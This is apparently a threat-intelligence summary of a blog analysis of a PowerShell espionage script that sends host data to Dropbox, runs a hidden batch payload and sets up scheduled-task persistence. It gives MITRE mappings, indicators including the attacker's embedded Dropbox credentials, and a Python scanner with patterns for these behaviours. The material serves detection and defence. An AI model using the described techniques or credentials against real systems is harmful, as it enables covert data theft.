A malicious PowerShell script named 외교광장.ps1 collects system information from infected PCs, obtains a Dropbox access token, uploads the collected data to Dropbox, and downloads a secondary payload (po.bat) from Dropbox, which it executes hidden via cmd.exe. A related script fetches additional files from koreadiplomacyplaza.kro.kr to deploy pm.exe and schedule a task for persistence; the campaign appears to target an organization tied to political figures. The Dropbox credentials and API endpoints are embedded in the script.
Keypoints
- The sample is a PowerShell script (외교광장.ps1, ~1 MB) that collects host data and exfiltrates it to Dropbox using OAuth2 credentials embedded in the script.
- Collected data includes running processes (Get-Process), OS version, public IP (nslookup myip.opendns.com), and installed antivirus products (Get-CimInstance root/SecurityCenter2 AntiVirusProduct), written to C:\Users\Public\Documents\tmp.ini.
- The script requests an access_token from Dropbox (oauth2/token) using the embedded client_id, client_secret, and refresh_token, then uploads the info file and attempts to download a secondary payload (/jhb_test.db) to C:\Users\Public\Music\po.bat and execute it hidden via cmd.exe.
- If the download succeeds, the Dropbox file is moved to a “…_sent” path to indicate success; temporary local files are removed after upload to evade detection.
- A separate malicious script downloads four files from koreadiplomacyplaza.kro.kr (default0–default3), copies executables and resources to C:\Users\Public\Videos, and creates a Scheduled Task (Transt_Feed_Synchronization-{GUID}) for persistence.
- The downloader uses curl -k to ignore SSL validation and %~dp0 to place files in the current script directory; fetched files include an executable (pm.exe), manifest, PowerShell script (1.ps1), and scheduler XML.
- Embedded Dropbox credentials in the script include client_id=75mc2yhns7tfcad, client_secret=q4bbqpnc5g2d85l, and a refresh_token beginning with iUPmF…; several Dropbox API endpoints are abused for upload, download, and move operations.
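As an added example (not code from the original blog post or this summary), a small Python triage scanner that flags the combination of behaviours listed in these keypoints when run over a plain, un-obfuscated PowerShell script body. The rule names, the constructed script fragments, the placeholder credentials and the assumed `-WindowStyle Hidden` form of the hidden cmd.exe execution are assumptions, not values from the page.

```python
import re

# Behavioural indicators drawn from the report on 외교광장.ps1 (hypothetical rule
# names; patterns assume the script text is plain, un-obfuscated PowerShell).
RULES = {
    "dropbox_token_refresh":  r"api\.dropboxapi\.com/oauth2/token",
    "dropbox_upload":         r"content\.dropboxapi\.com/2/files/upload",
    "dropbox_download":       r"content\.dropboxapi\.com/2/files/download",
    "embedded_refresh_token": r"refresh_token\s*=\s*['\"]?[A-Za-z0-9_\-]{20,}",
    "public_ip_lookup":       r"nslookup\s+myip\.opendns\.com",
    "av_enumeration":         r"SecurityCenter2.*AntiVirusProduct",
    "public_folder_staging":  r"C:\\Users\\Public\\(Documents|Music|Videos)\\",
    "hidden_execution":       r"-WindowStyle\s+Hidden",  # assumed form of "execute hidden"
    "insecure_curl":          r"\bcurl(\.exe)?\s+[^\n]*\s-k\b",
    "schtasks_xml_persist":   r"schtasks\s+/create\s+[^\n]*/xml",
}
COMPILED = {name: re.compile(pat, re.I) for name, pat in RULES.items()}

def scan_script(text: str) -> dict:
    """Return the matched rule names and a coarse verdict for one script body."""
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    core = {"dropbox_token_refresh", "embedded_refresh_token"}
    transfer = {"dropbox_upload", "dropbox_download"}
    if core <= hits and hits & transfer:      # token refresh + embedded token + file transfer
        verdict = "likely_dropbox_c2"
    elif len(hits) >= 2:
        verdict = "suspicious"
    elif hits:
        verdict = "low"
    else:
        verdict = "clean"
    return {"hits": sorted(hits), "verdict": verdict}

# Constructed fragments mimicking the reported behaviour; the credential is a placeholder.
SAMPLE = r'''
$refresh_token = "PLACEHOLDER_REFRESH_TOKEN_0123456789abcdef"
nslookup myip.opendns.com 208.67.222.220
Get-CimInstance root/SecurityCenter2 AntiVirusProduct > C:\Users\Public\Documents\tmp.ini
Invoke-RestMethod -Uri https://api.dropboxapi.com/oauth2/token ...
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload ...
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/download -OutFile C:\Users\Public\Music\po.bat
Start-Process cmd.exe -WindowStyle Hidden ...
'''
# Constructed benign-looking fragment: one Dropbox call, no embedded token, no staging path.
BENIGN = "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -InFile .\\report.pdf"

if __name__ == "__main__":
    print(scan_script(SAMPLE))   # verdict: likely_dropbox_c2
    print(scan_script(BENIGN))   # verdict: low
```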
MITRE Techniques
- [T1083] File and Directory Discovery – The script enumerates local files/paths and writes collected info to C:\Users\Public\Documents\tmp.ini (“…these were combined and written to C:\Users\Public\Documents\tmp(.)ini…”).
- [T1059.001] Command and Scripting Interpreter: PowerShell – Main malicious functionality implemented as a PowerShell script that collects data, calls REST APIs, downloads files, and starts processes (“…malicious PowerShell code … collects information and uploads to Dropbox and downloads a secondary payload (.bat) to execute”).
- [T1105] Ingress Tool Transfer – Downloads secondary payloads from Dropbox and from koreadiplomacyplaza.kro.kr (default0–default3) to local paths like C:\Users\Public\Music\po.bat and C:\Users\Public\Videos\pm.exe (“…downloaded four files from koreadiplomacyplaza(.)kro(.)kr and saved locally…”).
- [T1106] Native API – Uses Invoke-RestMethod (PowerShell) to call Dropbox APIs for token exchange, upload, download, and move operations (“…Invoke-RestMethod -Uri hxxps://api.dropboxapi.com/oauth2/token … used to obtain access_token”).
- [T1078] Valid Accounts – Uses embedded OAuth2 credentials (client_id, client_secret, refresh_token) to obtain Dropbox access tokens and access victim Dropbox storage (“…embedded credentials client_id=75mc2yhns7tfcad client_secret=q4bbqpnc5g2d85l refresh_token=…”).
- [T1036.005] Masquerade: Match Legitimate Name or Location – Writes files into common public directories (C:\Users\Public\Documents, C:\Users\Public\Music, C:\Users\Public\Videos) and uses filenames (po.bat, pm.exe) to blend in (“…copy malicious files to C:\Users\Public\Videos and name pm.exe…”).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (via Scheduled Task) – Creates a Scheduled Task named Transt_Feed_Synchronization-{GUID} using downloaded XML to maintain persistence (“…schtasks /create /tn Transt_Feed_Synchronization-{GUID} /xml "%~dp0default3" … to ensure persistence”).
- [T1566.001] Phishing: Spearphishing Link (C2) – Uses a domain koreadiplomacyplaza.kro.kr as a command-and-control / file-hosting domain to deliver payloads (“…remote C2 (koreadiplomacyplaza(.)kro(.)kr) from which multiple files are downloaded…”).
Indicators of Compromise
- [File Hashes] sample metadata – MD5: 8ef331da6a71931c8843488c6d13a1a2, SHA-256: 89a6d3392668ba1b765a5ebcc8ac5045fffe8b6ef431004cba352868424a5cc3
- [File Names / Paths] local artifacts and payloads – C:\Users\Public\Documents\tmp.ini (created then removed), C:\Users\Public\Music\po.bat, C:\Users\Public\Videos\pm.exe
- [Domains / URLs] C2 and Dropbox endpoints – koreadiplomacyplaza.kro.kr (used to host default0–default3), hxxps://api.dropboxapi.com/oauth2/token, hxxps://content.dropboxapi.com/2/files/upload, hxxps://content.dropboxapi.com/2/files/download
- [Credentials / Tokens] embedded OAuth2 credentials – client_id=75mc2yhns7tfcad, client_secret=q4bbqpnc5g2d85l, refresh_token=iUPmF(P)0K-HcAAAAAAAAAAUn2al_tpIVg_GqzVKP(m)27Q3IYlYX80OEDrbq7hZIFUB
- [DNS / Network] public IP discovery service – myip.opendns.com via DNS server 208.67.222.220 (used to obtain victim public IP)
Read more: https://wezard4u.tistory.com/429586